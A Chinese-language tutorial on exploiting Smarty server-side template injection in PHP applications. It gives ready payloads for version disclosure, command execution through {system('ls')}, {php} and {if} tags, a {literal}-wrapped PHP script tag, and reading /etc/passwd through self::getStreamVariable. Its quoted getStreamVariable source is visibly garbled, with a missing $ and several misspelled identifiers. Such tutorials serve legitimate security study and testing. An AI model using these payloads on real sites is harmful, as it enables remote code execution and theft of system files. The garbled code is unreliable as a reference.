深入解析Smarty SSTI 利用

Smarty

Smarty是基于PHP开发的，对于Smarty的SSTI 的利用与常见的flask的SSTI有很大区别，了解过Jinjia2模板注入的应该知道，Jinjia2是基于python的，而Smarty是基于PHP的，所以使用起来还是比较容易地，我们只需要达到 命令执行即可

查看版本

{$smarty.version}

常用标签

{php}

Smarty支持使用{php}{/php}标签来执行被包裹其中地命令，最常规地思路就是先测试该标签

{php}phpinfo(){/php}

不过Smarty已经废弃了{php}标签。在Smarty3.1，{php}仅可以在Smarty BC中使用。

直接输入命令即可

{system('ls')}

{literal}标签

官方手册这样描述这个标签

{literal}可以让一个模板区域的字符原样输出，这样常常用于保护页面上的JavaScript或者CSS样式表，避免因为Smarty的定界符而被错误解析

使用JavaScript语句进行命令执行，常见的变形语句：

<script language="php">phpinfo();</script>

当然这样的语法，在php5中可以使用，在PHP7中不可以使用。

因为**{literal}**中支持JavaScript语法，所以我们可以RCE

{literal}<script language="php">phpinfo();</script>
{/literal}

调用静态方法

通过self获取Smarty类，再调用其静态方法实现文件读写

Smarty类的getStreamVariable方法的代码

public function getStreamVariable($variable) {$_result = '';$fp = fopen($variable,'r+');if ($fp) {while(!feof($fp) && (current_line = fgets($fp)) != false){$_result .= $current_line;}fclose($fp);return $_result;}$smarty = isset($this -> smarty)?$this->smarty : $this;if($smarth->error_unassigned) {throw new SmartyExcption('undefined stram variable ""'.$variable.'"');}else {return null;}
}

这个方法可以读取一个文件并返回其内容，所以我们可以使用self来获取smarty对象，并调用这个方法，很多文章里面给的payload都形如

{self::getStreamVariable("file:///etc/passwd")}

{if}

官方文档中这样描述

Smarty的{if}条件判断和PHP的if非常相似，只是增加了一些特性，每个{if}必须有一个配对的{/if},也可以使用{else}和{elseif}，全部的PHP条件表达式和函数都可以在{if}内使用，比如|| 、 or 、 && 、 and 、is_array()等等，如{if_is_array($array)}{/if}*

既然全部的PHP函数都可以使用，那么我们可以是利用此来执行我们的代码

{if phpinfo()}{/if}
{if system('ls')}{/if}